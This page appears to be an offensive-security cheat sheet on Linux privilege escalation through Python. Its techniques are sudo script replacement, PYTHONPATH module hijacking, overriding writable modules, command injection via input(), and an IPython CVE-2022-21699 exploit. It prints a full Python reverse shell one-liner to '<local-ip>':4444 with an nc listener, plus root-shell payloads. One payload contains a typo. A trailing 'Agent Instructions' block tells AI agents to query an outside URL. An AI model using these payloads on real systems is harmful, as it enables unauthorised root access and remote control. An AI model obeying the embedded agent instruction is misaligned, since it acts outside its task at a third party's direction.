# Python Privilege Escalation

### [Sudo PrivEsc](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#sudo-privesc) <a href="#sudo-privesc" id="sudo-privesc"></a>

#### [Replace with Arbitrary Script](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#replace-with-arbitrary-script) <a href="#replace-with-arbitrary-script" id="replace-with-arbitrary-script"></a>

```bash
sudo -l

(root) NOPASSWD: /usr/bin/python3 /home/<username>/example.py
Copied!
```

If the python script is under the current user's home directory, we can remove the script and create the new one with the same name.

```bash
rm -rf /home/<username>/example.py
touch /home/<username>/example.py
Copied!
```

We can insert arbitrary code in the new script. For example,

```python
import os;os.system('/bin/bash')
Copied!
```

#### [Module Hijacking](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#module-hijacking) <a href="#module-hijacking" id="module-hijacking"></a>

Assume the python script can be executed as root with **SETENV,NOPASSWD**.\
For example,

```sh
sudo -l

(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/example.py
Copied!
```

With **SETENV**, we can change **PYTHONPATH** when executing the script, and insert malicious script to the module which is imported in the script.\
First off, check what module is imported in the python script (e.g. /opt/example.py here).

```python
import random

print(random.randint(1, 8))
Copied!
```

We can forge the imported module.

```sh
vim /tmp/random.py
Copied!
```

The content of the module is below. This is a script that executes reverse shell.\
Replace **`<local-ip>`** with your local ip address.

```sh
import socket,os,pty;s=socket.socket();s.connect(("<local-ip>",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
Copied!
```

After that, in another local terminal, start listener for getting a shell.

```sh
nc -lvnp 4444
Copied!
```

Then run the python script with updating **PYTHONPATH** in the remote machine.

```sh
sudo PYTHONPATH=/tmp/ /usr/bin/python3 /opt/example.py
Copied!
```

By setting **"PYTHONPATH=/tmp/"**, the python script will import modules from **/tmp/** directories so the **"random"** module is imported from **/tmp/random.py**.\
Finally, we should get a shell in local terminal.

#### [Module Overriding](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#module-overriding) <a href="#module-overriding" id="module-overriding"></a>

If the Python script contains a module that can be modified by current user, we can inject arbitrary code into the module.\
First, check what modules the Python script uses.

```bash
# example.py
import random
Copied!
```

Assume the **“random”** module is used in the script.\
Find the path of the module and check if it’s writable.

```bash
find / -name "random.py" 2>/dev/null
ls -al /usr/lib/python3.6/random.py
Copied!
```

If we know we can modify it, inject arbitrary code in this module.\
Assume the **“random”** module path is **`/usr/lib/python3.6/random.py`**.

```python
# /usr/lib/python3.6/random.py
import os;os.sytem('/bin/bash')
Copied!
```

Then execute the Python script and we can spawn the root shell.

<br>

### [OS Commands in input()](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#os-commands-in-input\(\)) <a href="#os-commands-in-input" id="os-commands-in-input"></a>

If you find the executable which is created in Python.\
For instance,

```sh
./executable

Enter some input:
Copied!
```

You can enter OS commands in some input.

```py
__import__('os').system('id')
Copied!
```

For example,

```sh
./executable

Enter some input: __import__('os').system('id')
Copied!
```

<br>

### [IPython Privilege Escalation (](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#ipython-privilege-escalation-\(cve-2022-21699\))[CVE-2022-21699](https://github.com/advisories/GHSA-pq7m-3gw7-gq5x)) <a href="#ipython-privilege-escalation-cve-2022-21699" id="ipython-privilege-escalation-cve-2022-21699"></a>

Interective Python (IPython) is a command shell for interective computing in multiple programming languages.

```sh
# -m: file mode (rwx)
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/exploit.py
Copied!
```

### References

* <https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://morgan-bin-bash.gitbook.io/linux-privilege-escalation/python-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.